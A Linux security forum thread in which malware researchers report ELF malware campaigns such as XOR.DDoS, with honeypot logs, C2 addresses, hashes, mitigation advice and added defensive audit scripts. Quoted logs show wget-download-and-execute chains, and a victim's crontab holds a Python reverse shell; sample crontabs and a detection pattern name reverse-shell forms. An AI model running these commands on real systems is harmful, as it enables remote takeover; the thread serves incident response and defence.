LinuxQuestions.org

Forum: Linux - Security (https://www.linuxquestions.org/questions/linux-security-4/)
Thread: If you were infected by any of these recent ELF malware cases, please contact us (https://www.linuxquestions.org/questions/linux-security-4/if-you-infected-by-any-of-these-recent-elf-malware-cases-please-contact-us-4175546925/)

malwaremustdie 07-01-2015 09:45 AM

If you were infected by any of these recent ELF malware cases, please contact us

This is not a spam post but a serious question. We found these five Linux malware families actively infecting systems in the past 2 weeks.

ChinaZ http://blog.malwaremustdie.org/2015/...-reloaded.html

Xor.DDoS http://blog.malwaremustdie.org/2015/...ection_23.html

DES.Downloader http://blog.malwaremustdie.org/2015/...5-new-elf.html

.IptabLes|x http://blog.malwaremustdie.org/2015/...tables-on.html

Mayhem http://www.kernelmode.info/forum/vie...tart=10#p26116

I am sure fellow server sysadmins know a bit about these malware. If you happen to have had an infection incident, please comment on the above posts and share the infection details with us, so we can handle it on an IR basis.

Samples can be uploaded to MediaFire. You can also reach our team at @malwaremustdie (Twitter).

Thank you very much

unixfreaxjp

ondoho 07-03-2015 03:45 AM

Could you please explain a little more what you are referring to?
I don't want to click on any random blog post.

unSpawn 07-03-2015 05:29 PM

Quote:

Originally Posted by ondoho (Post 5386567)
i don't want to click any random blogpost.

These aren't "random web log posts" and if you have any interest in practical security these are worth reading.

jefro 07-03-2015 07:25 PM

I'd have been too skerd to click on them too. Hard to get search results from my known web pages on the topic.

Habitual 07-04-2015 08:25 AM

I read MMD on a regular basis and I have nothing but respect for it.

malwaremustdie 07-04-2015 09:49 AM

I've been working with *NIX OSes for 21 years now. I started MMD to fight malware of all kinds, but I did not see ELF malware being handled the same way as the Windows ones, generally speaking.
I know how it feels to be a sysadmin since I've been one of you in the field, and I know how badly an ELF malware infection can ruin our weekdays or weekends too. I know how tight the budget is, and I also know how costly server-side protection is if we consider buying one... yet the information is so limited.

So I have dedicated most of my time to ELF recently, until the overall mitigation scheme works better.

The links I posted above are recent case reports and analyses. The attack sources recently are mostly China, except Linux/Mayhem, which is Ukraine-based.

I saw the infection sources and malware web panels and was surprised by the huge number of downloads, especially the ones that ride on the Shellshock infection scheme (this vulnerability really kicks). Also the Elasticsearch exploit and, of course, the weak SSH brute-force entries.

So I just think maybe more admins were hit; this is why I asked. You can click on every link I posted safely, I mean no harm. If you can comment with your cases it will be so wonderful.
We NEED more ways to mitigate the infection, like setting some directories under specific permissions, hardening SELinux at some points, running md5sum checks regularly for new changes in files, and so on.

Come on, friends, we cannot fight these alone; let's fight this bad stuff together.

MalwareMustDie
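
The regular md5sum checks mentioned in the post above, as an added example that is not code from the original post: a baseline-and-compare script that reports changed, new and missing files. It uses sha256sum rather than md5sum, and the sample tree, file names and tampering in fim_demo are constructed for the demonstration.

```shell
#!/usr/bin/env bash
# Added example, not code from the original post: a minimal file-integrity
# baseline of the kind the "md5sum checks regularly" advice describes.
# sha256sum is used instead of md5sum; paths containing whitespace are not
# handled (awk splits on it), which is fine for /bin, /sbin, /usr/bin etc.

# fim_baseline DIR BASELINE: hash every regular file under DIR into BASELINE
# ("<hash>  ./relative/path" per line, the sha256sum format). Keep BASELINE
# off the host or on read-only media: an attacker with root can rewrite it.
fim_baseline() {
    (cd "$1" && find . -type f -exec sha256sum {} +) > "$2"
}

# fim_check DIR BASELINE: rehash DIR and report, one per line,
#   CHANGED ./path   hash differs from the baseline (trojaned binary)
#   MISSING ./path   in the baseline but no longer on disk
#   NEW ./path       on disk but not in the baseline (a dropped file)
# Returns 0 when the tree matches the baseline, 1 when anything differs.
fim_check() {
    current=$(mktemp)
    (cd "$1" && find . -type f -exec sha256sum {} +) > "$current"
    diffs=$(awk '
        FILENAME == ARGV[1] { old[$2] = $1; next }        # baseline: path -> hash
        {                                                 # current tree
            if (!($2 in old))        print "NEW " $2
            else if (old[$2] != $1)  print "CHANGED " $2
            delete old[$2]
        }
        END { for (p in old) print "MISSING " p }' "$2" "$current" | sort)
    rm -f "$current"
    [ -n "$diffs" ] && printf '%s\n' "$diffs"
    [ -z "$diffs" ]
}

# fim_demo: constructed sample tree, baseline it, tamper with it, report.
fim_demo() {
    work=$(mktemp -d)
    mkdir -p "$work/tree/bin" "$work/tree/etc"
    printf 'sshd binary\n' > "$work/tree/bin/sshd"
    printf 'ls binary\n'   > "$work/tree/bin/ls"
    printf 'old config\n'  > "$work/tree/etc/old.conf"
    fim_baseline "$work/tree" "$work/baseline.sha256"
    printf 'trojaned ls\n' > "$work/tree/bin/ls"        # modified after baseline
    printf 'dropper\n'     > "$work/tree/bin/.hidden"   # dropped after baseline
    rm "$work/tree/etc/old.conf"                        # removed after baseline
    fim_check "$work/tree" "$work/baseline.sha256" || true
    rm -rf "$work"
}

fim_demo
```

Run fim_baseline once on a known-clean host, store the baseline elsewhere, and run fim_check from cron; a non-zero exit is the alert. The demo prints CHANGED ./bin/ls, MISSING ./etc/old.conf and NEW ./bin/.hidden.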

Daniel_sal 07-04-2015 10:24 AM

Come on guys, be smart. The people of MalwareMustDie are great; they only want a more secure Linux and to stop China malware. I always read his blog. I'm a sysadmin in Mexico; we have some apps living in the Rackspace cloud. In January we noticed some strange binary and IP connections to China; finally we discovered that somebody had infected us with an ELF using a Struts vulnerability in our JBoss app. This is the screenshot of the VirusTotal analysis: https://twitter.com/daniel_sal/statu...450181632?s=09

RHEL 6.5

Hope this helps.

malwaremustdie 07-04-2015 10:42 AM

There is a good repository for Linux sysadmins to identify ELF malware.
It is a perfectly safe site; KernelMode is a community of malware researchers. I am a contributor to the repository too, together with well-known malware researchers.

You can browse the ELF topics shown in the link freely and read the information on what malware hit you; some posts have good mitigation hints too, but you will need to subscribe to get the samples.

Link: http://www.kernelmode.info/forum/vie...hp?f=16&t=3471

ondoho 07-08-2015 03:53 AM

Thanks to the OP & everyone for adding more info on this.

I think it's good forum netiquette to post more than just links to other webpages.
I hadn't come across MalwareMustDie before.
I have now.

malwaremustdie 08-22-2015 10:21 AM

There is a new type of ELF malware, a backdoor/DDoS type that merges the functionality of Linux/Elknot (ref: http://www.kernelmode.info/forum/vie...&t=3099#p23858) and Linux/BillGates (ref: http://www.kernelmode.info/forum/vie...hp?f=16&t=3429).

The source of the threat is AS40676 in Psychz Networks, but it seems the actors are from the People's Republic of China.

This malware drops its initial config in the current directory where it is executed:
readlink("/proc/[PID]/exe", "/[PATH]/MALWARE", 1024)
open("/[PATH]/MALWARENAME\\xmit.ini", O_RDWR)
unlink("/[PATH]/MALWARENAME\\xmit.ini")
open("/[PATH]/MALWARENAME\\xmit.ini", O_RDWR|O_CREAT|O_TRUNC, 0666)
write(3, "0\r\n192.168.x.xx:192.168.x.xx\r\n10000:60000\r\n\r\n0\r\n0:0:0\r\n", 55)
close(3)

Which contains the grepped local Ethernet (IP) address and the range of ports to be used for the outbound attack:
00000000 30 0d 0a 31 39 32 2e 31 36 38 2e 37 2e 32 31 3a |0..192.168.x.x:|
00000010 31 39 32 2e 31 36 38 2e 37 2e 32 31 0d 0a 31 30 |192.168.x.xx..10|
00000020 30 30 30 3a 36 30 30 30 30 0d 0a 0d 0a 30 0d 0a |000:60000....0..|
00000030 30 3a 30 3a 30 0d 0a |0:0:0..|

I reversed this malware and found that the code is a bit "raw" and unfinished in some parts, but the main TCP flood and backdoor functions look like they work. Unlike the old-fashioned previous version that exhausts the system's resources, this malware runs and only takes about 30% of my CPU usage.

The way to mitigate is to secure the usage of libnss, never allow SSH login for root or anyone with uid 0, and don't run FTP and web services, or their components (webapps), that can be privilege-escalated to root. That way /tmp and the current directory of the infection will be the only workplace for such malware to operate in, and it is easier to clean up and dissect.

I am sorry to post more links, but if you want to see the boring details, they are here: http://blog.malwaremustdie.org/2015/...w-malware.html
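
The hardening advice in the post above (no SSH login for root or any other uid-0 account), as an added example that is not code from the original post: two audit checks that read a passwd file and an sshd_config. They are run here against constructed sample files; the "toor" account and the sshd_config contents are made up for the demonstration.

```shell
#!/usr/bin/env bash
# Added example, not code from the original post: audit checks for the
# "no root SSH login, no extra uid-0 users" advice. Each function takes a
# file path so it can run against /etc/passwd and /etc/ssh/sshd_config or
# against the constructed samples written by audit_demo.

# uid0_accounts PASSWD: print every account whose UID (field 3) is 0.
# Anything besides "root" is a second root-equivalent login to investigate.
uid0_accounts() {
    awk -F: '$3 == 0 { print $1 }' "$1"
}

# sshd_permit_root_login SSHD_CONFIG: print the effective global PermitRootLogin.
# sshd uses the first value it reads for a keyword, keywords are case-
# insensitive, and a Match block ends the global section, so we stop there.
# "unset" means the build's default applies (it differs across OpenSSH
# versions), so set it explicitly to "no".
sshd_permit_root_login() {
    awk 'tolower($1) == "match"           { exit }
         tolower($1) == "permitrootlogin" { print tolower($2); found = 1; exit }
         END { if (!found) print "unset" }' "$1"
}

# audit_verdict PASSWD SSHD_CONFIG: 0 if only root has uid 0 and root SSH
# login is "no", 1 otherwise (usable as a cron or monitoring check).
audit_verdict() {
    [ "$(uid0_accounts "$1")" = "root" ] && \
    [ "$(sshd_permit_root_login "$2")" = "no" ]
}

# audit_demo: constructed passwd and sshd_config, then the three checks.
audit_demo() {
    work=$(mktemp -d)
    cat > "$work/passwd" <<'EOF'
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
toor:x:0:0:second root:/tmp:/bin/sh
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
EOF
    cat > "$work/sshd_config" <<'EOF'
# PermitRootLogin yes
PermitRootLogin no
# a later duplicate is ignored: sshd keeps the first value
PermitRootLogin yes
Match User deploy
    PermitRootLogin yes
EOF
    printf 'uid0 accounts: %s\n' "$(uid0_accounts "$work/passwd" | paste -sd' ' -)"
    printf 'PermitRootLogin: %s\n' "$(sshd_permit_root_login "$work/sshd_config")"
    if audit_verdict "$work/passwd" "$work/sshd_config"; then
        echo "verdict: ok"
    else
        echo "verdict: FAIL"
    fi
    rm -rf "$work"
}

audit_demo
```

On the constructed input the verdict is FAIL because of the extra uid-0 account "toor", even though PermitRootLogin resolves to "no"; on a real host, pass /etc/passwd and /etc/ssh/sshd_config (and remember that sshd_config Include directives, if your version supports them, are not followed by this check).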

rokytnji 08-22-2015 12:01 PM

Subscribed to thread. MMD Site bookmarked. Being a slow study. It takes me awhile to soak things in.

malwaremustdie 09-15-2015 05:33 AM

A new series of Linux/XOR.DDoS attacks is hitting our Linux servers, dear admin friends.

It started from SSH brute-force attacks from:
Code:

43.229.52.79
43.229.53.28
43.229.53.49
43.229.53.63
43.229.53.88
43.255.188.139
43.255.189.16

Be cautious of brute-force logins like the ones below:
Code:

2015-06-22 19:42:27+0900 [ip=43.229.52.79] login attempt [root/1895-June]
2015-06-22 19:42:28+0900 [ip=43.229.52.79] login attempt [root/ep.123456]
2015-06-22 19:42:29+0900 [ip=43.229.52.79] login attempt [root/otrs12345]
2015-06-22 19:42:32+0900 [ip=43.229.52.79] login attempt [root/123ts3321]
2015-06-22 19:42:34+0900 [ip=43.229.52.79] login attempt [root/rw.123456]
2015-06-22 19:42:35+0900 [ip=43.229.52.79] login attempt [root/audenzio1]
2015-06-22 19:42:38+0900 [ip=43.229.52.79] login attempt [root/DROWSS@P1]
2015-06-22 19:42:39+0900 [ip=43.229.52.79] login attempt [root/bcampbell]
2015-06-22 19:42:40+0900 [ip=43.229.52.79] login attempt [root/cmarshall]
2015-06-22 19:42:43+0900 [ip=43.229.52.79] login attempt [root/dragostea]
2015-06-22 19:42:44+0900 [ip=43.229.52.79] login attempt [root/rx.123456]
2015-06-22 19:42:45+0900 [ip=43.229.52.79] login attempt [root/soigan123]
2015-06-22 19:42:48+0900 [ip=43.229.52.79] login attempt [root/adajacobs]
2015-06-22 19:42:50+0900 [ip=43.229.52.79] login attempt [root/ta.123456]
2015-06-22 19:42:51+0900 [ip=43.229.52.79] login attempt [root/aquilino1]
2015-06-22 19:42:54+0900 [ip=43.229.52.79] login attempt [root/root22222]
2015-06-22 19:42:55+0900 [ip=43.229.52.79] login attempt [root/0isPLIqsm]
2015-06-22 19:42:56+0900 [ip=43.229.52.79] login attempt [root/jmcmurray]
2015-06-22 19:42:59+0900 [ip=43.229.52.79] login attempt [root/yr.123456]
2015-06-22 19:43:00+0900 [ip=43.229.52.79] login attempt [root/vikiyulia]
2015-06-22 19:43:01+0900 [ip=43.229.52.79] login attempt [root/doriana12]
2015-06-22 19:43:04+0900 [ip=43.229.52.79] login attempt [root/casper11]
2015-06-22 19:43:06+0900 [ip=43.229.52.79] login attempt [root/yb.123456]
2015-06-22 19:43:07+0900 [ip=43.229.52.79] login attempt [root/wangyi123]
2015-06-22 19:43:10+0900 [ip=43.229.52.79] login attempt [root/uj.123456]
2015-06-22 19:43:11+0900 [ip=43.229.52.79] login attempt [root/aavishkar]
2015-06-22 19:43:12+0900 [ip=43.229.52.79] login attempt [root/046194575]
2015-06-22 19:43:15+0900 [ip=43.229.52.79] login attempt [root/marquardt]
2015-06-22 19:43:16+0900 [ip=43.229.52.79] login attempt [root/pavila123]
2015-06-22 19:43:17+0900 [ip=43.229.52.79] login attempt [root/io.123456]
2015-06-22 19:43:20+0900 [ip=43.229.52.79] login attempt [root/1234%mm&*]
2015-06-22 19:43:22+0900 [ip=43.229.52.79] login attempt [root/victoriar]
2015-06-22 19:43:23+0900 [ip=43.229.52.79] login attempt [root/in.123456]
(...)
2015-09-01 13:50:34+0900 [ip=43.229.53.28] login attempt [root/!@]
2015-09-01 14:24:36+0900 [ip=43.229.53.28] login attempt [root/!@]
2015-09-01 14:58:45+0900 [ip=43.229.53.28] login attempt [root/!@]
2015-09-01 15:54:43+0900 [ip=43.229.53.28] login attempt [root/!@]
2015-09-10 13:29:00+0900 [ip=43.229.53.49] login attempt [root/!@]
2015-09-10 14:18:02+0900 [ip=43.229.53.49] login attempt [root/!@]
2015-09-11 10:58:51+0900 [ip=43.229.53.49] login attempt [root/!@]
2015-09-11 11:41:14+0900 [ip=43.229.53.49] login attempt [root/!@]
2015-09-11 12:18:56+0900 [ip=43.229.53.49] login attempt [root/!@]
2015-09-14 13:58:40+0900 [ip=43.229.53.49] login attempt [root/!@]

This leads to the malware attempting to infect, as per the real log below:
Code:

2015-08-09 19:05:49+0900 [ip=43.229.53.88] exec command: #!/bin/sh
2015-08-09 19:05:49+0900 [ip=43.229.53.88] PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
2015-08-09 19:05:49+0900 [ip=43.229.53.88] wget h00p://192.126.112.88/abf/h12
2015-08-09 19:05:52+0900 [ip=43.229.53.88] chmod +x h12
2015-08-09 19:05:52+0900 [ip=43.229.53.88] ./h12
 
2015-08-25 12:45:48+0900 [ip=43.229.53.90] exec command: #!/bin/sh
2015-08-25 12:45:48+0900 [ip=43.229.53.90] PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
2015-08-25 12:45:48+0900 [ip=43.229.53.90] wget h00p://43.229.53.88/abf/h121
2015-08-25 12:45:48+0900 [ip=43.229.53.90] chmod +x h121
2015-08-25 12:45:48+0900 [ip=43.229.53.90] ./h121
 
2015-08-31 16:29:46+0900 [ip=43.229.53.90] exec command: #!/bin/sh
2015-08-31 16:29:46+0900 [ip=43.229.53.90] PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
2015-08-31 16:29:46+0900 [ip=43.229.53.90] wget h00p://43.229.53.90/abf/i324
2015-08-31 16:29:46+0900 [ip=43.229.53.90] chmod +x i324
2015-08-31 16:29:46+0900 [ip=43.229.53.90] ./i324
 
2015-09-10 13:33:49+0900 [ip=43.229.53.90] exec command: #!/bin/sh
2015-09-10 13:33:49+0900 [ip=43.229.53.90] PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
2015-09-10 13:33:49+0900 [ip=43.229.53.90] wget h00p://43.229.53.90/abf/g13e
2015-09-10 13:33:49+0900 [ip=43.229.53.90] chmod +x g13e
2015-09-10 13:33:49+0900 [ip=43.229.53.90] ./g13e
 
2015-09-14 14:02:02+0900 [ip=43.229.53.90] exec command: #!/bin/sh
2015-09-14 14:02:02+0900 [ip=43.229.53.90] PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
2015-09-14 14:02:02+0900 [ip=43.229.53.90] wget h00p://43.229.53.90/abf/f1c3
2015-09-14 14:02:02+0900 [ip=43.229.53.90] chmod +x f1c3
2015-09-14 14:02:02+0900 [ip=43.229.53.90] ./f1c3

If you want to study the malware, you can search VirusTotal; I uploaded some of the samples, with these hashes:
Code:

142e14d7872cbd783246d3be0396f3eb3c9fbd2c30d571ff3bd7769e00c08fcd
8d25feed690c1381f70018f5b905efbc9d8901098371cdeb8f32aa4d358210c7
a5afcc42f5eb61dc7992576195f8abb1c519d32d8c788b547d3b634277f16681

The malware connects via HTTP to aa.hostasa.org and performs command-and-control back-connects to several IPs, resolved from the hostnames summarized/recorded below:
Code:

aa.hostasa.org  23.234.60.143  // http downloads h00p://aa.hostasa.org/leg.rar
(a XOR-ed ELF trojan/downloader, previously known as "g.rar")
ns1.hostasa.org 107.160.40.9      // cnc
ns2.hostasa.org 103.240.140.152  // cnc
ns3.hostasa.org 103.240.141.54    // cnc
ns4.hostasa.org 192.126.126.64    // cnc
 
;; AUTHORITY SECTION:
hostasa.org.            3600    IN      NS      ns1cnb.domain-resolution.net.
hostasa.org.            3600    IN      NS      ns4lny.domain-resolution.net.
hostasa.org.            3600    IN      NS      ns3cna.domain-resolution.net.
hostasa.org.            3600    IN      NS      ns2dky.domain-resolution.net.

Some recent PoC of the backdoor/back-connection to those CNCs:
Code:

[pid  6990] sendto(3, "\326,\1\0\0\1\0\0\0\0\0\0\3ns4\7hostasa\3org\0\0\1\0"..., 33, 0, {sa_family=AF_INET, sin_port=htons(53), sin_addr=inet_addr("8.8.8.8")}, 16 <unfinished ...>
[pid  6991] sendto(4, "G\r\1\0\0\1\0\0\0\0\0\0\2aa\7hostasa\3org\0\0\1\0\1", 32, 0, {sa_family=AF_INET, sin_port=htons(53), sin_addr=inet_addr("8.8.8.8")}, 16 <unfinished ...>

ghrirsbfv  IPv4  324559  TCP MMD-JP.ORG:49214->192.126.126.64:3307 (ESTABLISHED)
ghrirsbfv  IPv4  331887  TCP MMD-JP.ORG:44325->107.160.40.9:3307 (ESTABLISHED)


ghrirsbfv  IPv4  324560  TCP MMD-JP.ORG:58487->23.234.60.143:http (ESTABLISHED)

2015-09-15 06:55:12.954090 IP MMD-JP.ORG.58476 > 23.234.60.143
http: Flags [P.], seq 1:215, ack 1, win 884, options [nop,nop,TS val 34190894 ecr 2820891477], length 214
E..6.@.@....nJ...<..l.Ps...J......tk.........#cU

GET /leg.rar HTTP/1.1
Accept: */*
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
Host: aa.hostasa.org
Connection: Keep-Alive
[...]

2015-09-15 06:55:13.121609 IP 23.234.60.143.http > MMD-JP.ORG.58476:
Flags [.], seq 1:1403, ack 215, win 54, options [nop,nop,TS val 2820891645 ecr 34190894], length 1402
E....h@.4.)#..<..nJ..P.lJ...s..i...6........#c..  ..

HTTP/1.1 200 OK
Date: Tue, 15 Sep 2015 05:54:14 GMT
Server: Apache
Last-Modified: Sun, 07 Dec 2014 08:27:46 GMT
ETag: "2475-5099c15a16480"
Accept-Ranges: bytes
Content-Length: 9333
Keep-Alive: timeout=5, max=2048
Connection: Keep-Alive
Content-Type: application/x-rar-compressed

/&.{L9R$/8PE    .h.pl.~u..qqm....h.{r..v..qop....t.ls.jp..sqv....w.wn.vq..sos
[...]

GeoLocation and routing info for the abused nodes used as CNC by the malware crooks:
Code:

// ------------------------
// Infector & CNC IP routes:
// ------------------------

43.229.52.79||63857 | 43.229.52.0/24 | HOTNETLIMITED | HK | - | Hot Net Limited
43.229.53.28||63857 | 43.229.53.0/24 | HOTNETLIMITED | HK | - | Hot Net Limited
43.229.53.49||63857 | 43.229.53.0/24 | HOTNETLIMITED | HK | - | Hot Net Limited
43.229.53.63||63857 | 43.229.53.0/24 | HOTNETLIMITED | HK | - | Hot Net Limited
43.229.53.88||63857 | 43.229.53.0/24 | HOTNETLIMITED | HK | - | Hot Net Limited
43.255.188.139||36351 | 43.255.188.0/24 | SOFTLAYER | US | - | Sex Insex
43.255.189.16|| |  |  | HK | 0451dns.com | Shimizu Hang Road Causeway Bay Hong Kong International

23.234.60.143||26484 | 23.234.60.0/24 | HOSTSPACE | US | hostspaces.net | Hostspace Networks LLC
107.160.40.9||40676 | 107.160.0.0/16 | AS40676 | US | psychz.net | Psychz Networks
103.240.140.152||62466 | 103.240.140.0/24 | CLEAR-DDOS-AS | CA | clear-ddos.com | ClearDDoS Technologies
103.240.141.54||62466 | 103.240.141.0/24 | CLEAR-DDOS-AS | CA | clear-ddos.com | ClearDDoS Technologies
192.126.126.64||26484 | 192.126.126.0/24 | HOSTSPACE | US | hostspaces.net | Hostspace Networks LLC

// ------------------------
// Infector & CNC GeoIP
// ------------------------

43.229.52.79, , ,  Hong Kong, 22.25, 114.1667, AS
43.229.53.28, , ,  Hong Kong, 22.25, 114.1667, AS
43.229.53.49, , ,  Hong Kong, 22.25, 114.1667, AS
43.229.53.63, , ,  Hong Kong, 22.25, 114.1667, AS
43.229.53.88, , ,  Hong Kong, 22.25, 114.1667, AS
43.255.188.139, , , Hong Kong, 22.25, 114.1667, AS
43.255.189.16, , ,  Hong Kong, 22.25, 114.1667, AS

23.234.60.143, Newark, 19711, United States, 39.7151, -75.7306
107.160.40.9, Walnut, 91789, United States, 34.0115, -117.8535
103.240.140.152, Central District, , Hong Kong, 22.2833, 114.15
103.240.141.54, Central District, , Hong Kong, 22.2833, 114.15, AS
192.126.126.64, Los Angeles, 90017, United States, 34.053, -118.2642

Note that the attackers are putting the payload malware on only this IP:
Code:

43.229.53.90

Compared to the previous case of the same actor (threat source), I found that they shifted the CNC IPs to:
Code:

192.126.126.64 &
107.160.40.9

Reference of this threat:
https://pastebin.com/uT6EhZq0

Reference of this case/actor:
http://blog.malwaremustdie.org/2015/...ection_23.html

Reference of the same malware cases:
http://blog.malwaremustdie.org/2015/...hellshock.html
http://blog.malwaremustdie.org/2014/...new-china.html

Cross-checking the domain registration leads to the contact ID below:
Code:

蔡厚泉 (Cai Hou Sien/Quan) / 2511916764@qq.com
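
The brute-force and wget/chmod/execute logs in the post above, with an added example that is not code from the original post: a triage script for log lines in that same "[ip=...] login attempt [user/pass]" and "[ip=...] <command>" format. It is run here against constructed lines that use RFC 5737 documentation addresses (192.0.2.x, 198.51.100.x, 203.0.113.x) rather than the real attacker IPs.

```shell
#!/usr/bin/env bash
# Added example, not code from the original post: triage of SSH honeypot /
# auth log lines in the "[ip=...] login attempt [user/pass]" and
# "[ip=...] <command>" format shown in the thread. write_sample_log writes
# a constructed log; the two query functions work on any file in that format.

# write_sample_log FILE: constructed log with one source guessing root
# passwords, one stray attempt, then the wget / chmod +x / run drop chain.
write_sample_log() {
    cat > "$1" <<'EOF'
2015-06-22 19:42:27+0900 [ip=192.0.2.10] login attempt [root/123456]
2015-06-22 19:42:28+0900 [ip=192.0.2.10] login attempt [root/password]
2015-06-22 19:42:29+0900 [ip=192.0.2.10] login attempt [root/admin123]
2015-06-22 19:42:32+0900 [ip=192.0.2.10] login attempt [root/!@]
2015-06-22 19:43:00+0900 [ip=198.51.100.7] login attempt [root/toor]
2015-06-22 19:50:00+0900 [ip=192.0.2.10] exec command: #!/bin/sh
2015-06-22 19:50:00+0900 [ip=192.0.2.10] PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
2015-06-22 19:50:00+0900 [ip=192.0.2.10] wget h00p://203.0.113.5/abf/h12
2015-06-22 19:50:01+0900 [ip=192.0.2.10] chmod +x h12
2015-06-22 19:50:01+0900 [ip=192.0.2.10] ./h12
EOF
}

# bruteforce_sources LOG THRESHOLD: source IPs with at least THRESHOLD login
# attempts, printed as "ip count" and sorted; feed the IPs to the firewall
# or fail2ban.
bruteforce_sources() {
    awk -v t="$2" '
        /login attempt/ && match($0, /\[ip=[0-9.]+\]/) {
            n[substr($0, RSTART + 4, RLENGTH - 5)]++    # strip "[ip=" and "]"
        }
        END { for (ip in n) if (n[ip] >= t) print ip, n[ip] }' "$1" | sort
}

# payload_drops LOG: for every "wget <url>" an intruder ran after logging in,
# print "ip url" so the download host can be blocked and the file fetched
# for analysis (the URL stays defanged as h00p:// exactly as logged).
payload_drops() {
    awk '
        /[[:space:]]wget[[:space:]]/ {
            ip = "?"
            if (match($0, /\[ip=[0-9.]+\]/)) ip = substr($0, RSTART + 4, RLENGTH - 5)
            for (i = 1; i < NF; i++) if ($i == "wget") print ip, $(i + 1)
        }' "$1"
}

# Demo on the constructed log.
log=$(mktemp)
write_sample_log "$log"
echo "brute-force sources (>= 3 attempts):"; bruteforce_sources "$log" 3
echo "payloads fetched:";                    payload_drops "$log"
rm -f "$log"
```

With a threshold of 3 the demo reports "192.0.2.10 4" as the brute-force source and "192.0.2.10 h00p://203.0.113.5/abf/h12" as the dropped payload; the chmod +x and ./h12 lines that follow a wget from the same IP are the confirmation that the download was executed, not merely fetched.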

malwaremustdie 09-17-2015 02:52 PM

I wrote up a new ELF malicious activity, a threat aimed at Linux that uses a polymorphic method during infection.

This is a bit technical, but practically all of the analysis I just wrote was done in the bash shell; I jumped to browse it when I was about to post it. I think it is a thorough explanation combining reverse engineering, Linux kernel debugging and forensics (mostly memory data from /proc) for this simple analysis.

Why I announce it here too is because most samples of this threat (XOR.DDoS) that went into signatures are from pre-infection and not post-infection, so if you conduct scanning AFTER you get infected there is a possibility that you get no detection, since the malware self-copies into another size and hash.

Please read; I hope it makes our POSIX-based OSes safer from these attackers.

http://blog.malwaremustdie.org/2015/...ic-in-elf.html

MasterCATZ 12-05-2016 12:37 AM

My server just got hit today.

Unsure how they gained access; the firewall was set up to drop all connections below port 10000
that are not in my IP range...

This was in the crontab:
Code:

*/1 * * * * root /usr/local/rtm/bin/rtm 35 > /dev/null 2> /dev/null
* * * * * root /usr/bin/python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("183.131.83.13",2810));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
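
As an added example that is not code from the original post: a check that scans crontab-format files for reverse-shell entries like the Python one-liner above and extracts the callback host:port. It goes one step beyond the post by also recognising the bash /dev/tcp form. The sample crontab, and the 192.0.2.44 and 198.51.100.9 addresses in it, are constructed for the demonstration.

```shell
#!/usr/bin/env bash
# Added example, not code from the original post: find reverse-shell entries
# in crontab files and pull out where they call back to. Run it over
# /etc/crontab, /etc/cron.d/*, /var/spool/cron/* and the output of
# `crontab -l -u <user>`; write_sample_crontab builds a constructed input.

# write_sample_crontab FILE: two ordinary entries, a python reverse shell of
# the kind quoted in the thread, and a bash /dev/tcp reverse shell.
write_sample_crontab() {
    cat > "$1" <<'EOF'
# constructed crontab sample
17 * * * * root cd / && run-parts --report /etc/cron.hourly
0 3 * * * root /usr/local/bin/backup.sh > /dev/null 2>&1
* * * * * root /usr/bin/python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.0.2.44",2810));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
*/5 * * * * root bash -i >& /dev/tcp/198.51.100.9/4444 0>&1
EOF
}

# cron_reverse_shells FILE: print "line:entry" for entries carrying common
# reverse-shell building blocks: a raw socket or fd duplication onto an
# interactive shell (python/perl style), bash's /dev/tcp, nc -e, or a mkfifo
# pipe. Exit status is 1 when nothing matches (grep semantics).
cron_reverse_shells() {
    grep -nE 'socket\.socket|dup2\(|/bin/(ba)?sh.{0,4}-i|/dev/tcp/|nc .*-e|mkfifo' "$1"
}

# cron_callbacks FILE: host:port targets, from python-style connect(("h",p))
# and from bash /dev/tcp/h/p redirections, deduplicated. Block these and
# search netflow / firewall logs for earlier connections to them.
cron_callbacks() {
    {
        grep -oE 'connect\(\("[0-9.]+", *[0-9]+\)\)' "$1" \
            | sed -E 's/connect\(\("([0-9.]+)", *([0-9]+)\)\)/\1:\2/'
        grep -oE '/dev/tcp/[0-9.]+/[0-9]+' "$1" \
            | sed -E 's#/dev/tcp/([0-9.]+)/([0-9]+)#\1:\2#'
    } | sort -u
}

# Demo on the constructed crontab.
ct=$(mktemp)
write_sample_crontab "$ct"
echo "suspicious entries:"; cron_reverse_shells "$ct" || true
echo "callback addresses:"; cron_callbacks "$ct"
rm -f "$ct"
```

On the constructed file this flags lines 4 and 5 and reports 192.0.2.44:2810 and 198.51.100.9:4444. The pattern list is a starting point, not a complete one; entries that merely run an odd binary from /tmp, /dev/shm or an unexpected path (like the first crontab line quoted above) need a manual look at the file itself.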

mostafashaban 12-16-2017 11:25 PM

Thanks.
